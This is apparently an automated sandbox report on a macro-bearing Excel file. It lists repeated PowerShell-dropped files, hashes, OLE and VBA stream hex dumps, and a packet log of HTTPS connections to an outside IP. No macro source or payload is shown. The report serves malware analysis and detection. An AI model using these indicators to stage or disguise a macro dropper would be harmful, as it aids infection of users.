| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1 |
| Entropy (8bit): | 0.0 |
| Encrypted: | false |
| SSDEEP: | 3:U:U |
| MD5: | C4CA4238A0B923820DCC509A6F75849B |
| SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
| SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
| Malicious: | false |
| Reputation: | unknown |
| Preview: |
| File type: | |
| Entropy (8bit): | 4.783836383736489 |
| TrID: |
|
| File name: | 827837hj.xls |
| File size: | 27136 |
| MD5: | a3a7be7f733771ff24d6286ea49db98c |
| SHA1: | 9017cdc08851f162ae8ca54cfde0841526f4ebbf |
| SHA256: | 348d37d813ca44c373ddd848e39f0ec422982b57e23b502f5ed10a5c86829485 |
| SHA512: | 3429d9049631bf85cb26394881511cda0af68d2cb6dbf6dbf867b10e46bbf2dc3fbd7769afb9727b8c82cdb3c8c586c84d3b24c4a15cc50a409b1bf70e6f04be |
| SSDEEP: | 768:c4k3hOdsylKlgryzc4bNhZFGzE+cL2knAJ1OiCkOGBeS:7k3hOdsylKlgryzc4bNhZFGzE+cL2kn9 |
| TLSH: | E0C22EA6B2D6DC05DE4507794CE782E66627FC516FA3938B3389F71E0B71AC0890361B |
| File Content Preview: | ........................>...................................".................................................................................................................................................................................................. |
 | |
| Icon Hash: | 74ecd4c6c3c6c4d8 |
| Document Type: | OLE |
| Number of OLE Files: | 1 |
| Has Summary Info: | |
| Application Name: | Microsoft Excel |
| Encrypted Document: | False |
| Contains Word Document Stream: | False |
| Contains Workbook/Book Stream: | True |
| Contains PowerPoint Document Stream: | False |
| Contains Visio Document Stream: | False |
| Contains ObjectPool Stream: | False |
| Flash Objects Count: | 0 |
| Contains VBA Macros: | True |
| Code Page: | 1252 |
| Author: | |
| Last Saved By: | |
| Create Time: | 2022-01-08 17:02:42 |
| Last Saved Time: | 2022-11-26 17:01:47 |
| Creating Application: | |
| Security: | 0 |
| Document Code Page: | 1252 |
| Thumbnail Scaling Desired: | False |
| Company: | |
| Contains Dirty Links: | False |
| Shared Document: | False |
| Changed Hyperlinks: | False |
| Application Version: | 983040 |
General | |
| Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet1 |
| VBA File Name: | Sheet1.cls |
| Stream Size: | 991 |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . J { w . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - |
| Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 4a 7b 77 91 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
|
General | |
| Stream Path: | _VBA_PROJECT_CUR/VBA/ThisWorkbook |
| VBA File Name: | ThisWorkbook.cls |
| Stream Size: | 2182 |
| Data ASCII: | . . . . . . . . * . . . . . . . . . . 1 . . . . . . . . . . . . . . . J { l . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 |
| Data Raw: | 01 16 03 00 00 f0 00 00 00 2a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 31 03 00 00 0d 06 00 00 00 00 00 00 01 00 00 00 4a 7b 6c b6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
|
General | |
| Stream Path: | \x1CompObj |
| File Type: | data |
| Stream Size: | 107 |
| Entropy: | 4.184829500435969 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . . |
| Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
| Stream Path: | \x5DocumentSummaryInformation |
| File Type: | data |
| Stream Size: | 244 |
| Entropy: | 2.6796401275610178 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 2 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . |
| Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00 |
General | |
| Stream Path: | \x5SummaryInformation |
| File Type: | data |
| Stream Size: | 208 |
| Entropy: | 3.5121006031096327 |
| Base64 Encoded: | False |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u s e r - u . . . . . . . . . . u s e r - t . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . z . . @ . . . . . . . . . . . . . . . |
| Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 |
General | |
| Stream Path: | Workbook |
| File Type: | Applesoft BASIC program data, first line number 16 |
| Stream Size: | 15369 |
| Entropy: | 5.233170123244297 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . \\ . p . . . . u s e r - t B . . . . a . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P K . 8 . . . . . . . X . @ . . . . . . . . . . " . . . |
| Data Raw: | 09 08 10 00 00 06 05 00 54 38 cd 07 c9 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 06 00 00 75 73 65 72 2d 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
General | |
| Stream Path: | _VBA_PROJECT_CUR/PROJECT |
| File Type: | ASCII text, with CRLF line terminators |
| Stream Size: | 418 |
| Entropy: | 5.301945242354764 |
| Base64 Encoded: | True |
| Data ASCII: | I D = " { E 9 C 4 C 8 5 4 - 5 4 3 3 - 4 6 C 0 - 9 A 3 4 - A 4 7 B A 0 3 0 8 3 3 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 4 D 6 6 3 5 9 E 3 2 9 E 7 2 9 E 7 2 9 E 7 2 9 E 7 " . . D P B = " A 8 A A 1 F 6 0 2 0 6 0 2 0 6 0 " . . G C = " 7 C 7 E C B E 1 4 B B 4 4 C B 4 |
| Data Raw: | 49 44 3d 22 7b 45 39 43 34 43 38 35 34 2d 35 34 33 33 2d 34 36 43 30 2d 39 41 33 34 2d 41 34 37 42 41 30 33 30 38 33 33 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 |
General | |
| Stream Path: | _VBA_PROJECT_CUR/PROJECTwm |
| File Type: | data |
| Stream Size: | 62 |
| Entropy: | 3.0554671543224337 |
| Base64 Encoded: | False |
| Data ASCII: | T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . . |
| Data Raw: | 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00 |
General | |
| Stream Path: | _VBA_PROJECT_CUR/VBA/_VBA_PROJECT |
| File Type: | data |
| Stream Size: | 2514 |
| Entropy: | 4.116405719590362 |
| Base64 Encoded: | False |
| Data ASCII: | a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o |
| Data Raw: | cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
General | |
| Stream Path: | _VBA_PROJECT_CUR/VBA/dir |
| File Type: | data |
| Stream Size: | 515 |
| Entropy: | 6.284610049457919 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . { e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E . |
| Data Raw: | 01 ff b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7b ad 82 65 04 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 4, 2022 12:05:56.958373070 CET | 49700 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:56.958417892 CET | 443 | 49700 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:56.958493948 CET | 49700 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:56.984857082 CET | 49700 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:56.984924078 CET | 443 | 49700 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.080792904 CET | 443 | 49700 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.081005096 CET | 49700 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.088515043 CET | 49700 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.088555098 CET | 443 | 49700 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.089153051 CET | 443 | 49700 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.133106947 CET | 49700 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.133150101 CET | 443 | 49700 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.167442083 CET | 443 | 49700 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.167545080 CET | 443 | 49700 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.167674065 CET | 49700 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.171144009 CET | 49700 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.174556017 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.174628973 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.174757957 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.175152063 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.175182104 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.279593945 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.284322023 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.284358978 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.346359015 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.346410036 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.346563101 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.346596956 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.346625090 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.380285025 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.380398035 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.380481005 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.380523920 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.380554914 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.380592108 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.380671024 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.380683899 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.414057016 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.414151907 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.414249897 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.414279938 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.414304972 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.414602041 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.414717913 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.414726019 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.414894104 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.414968014 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.414975882 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.415193081 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.415266037 CET | 49701 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:05:57.415272951 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:05:57.415685892 CET | 443 | 49701 | 93.93.131.124 | 192.168.2.3 |
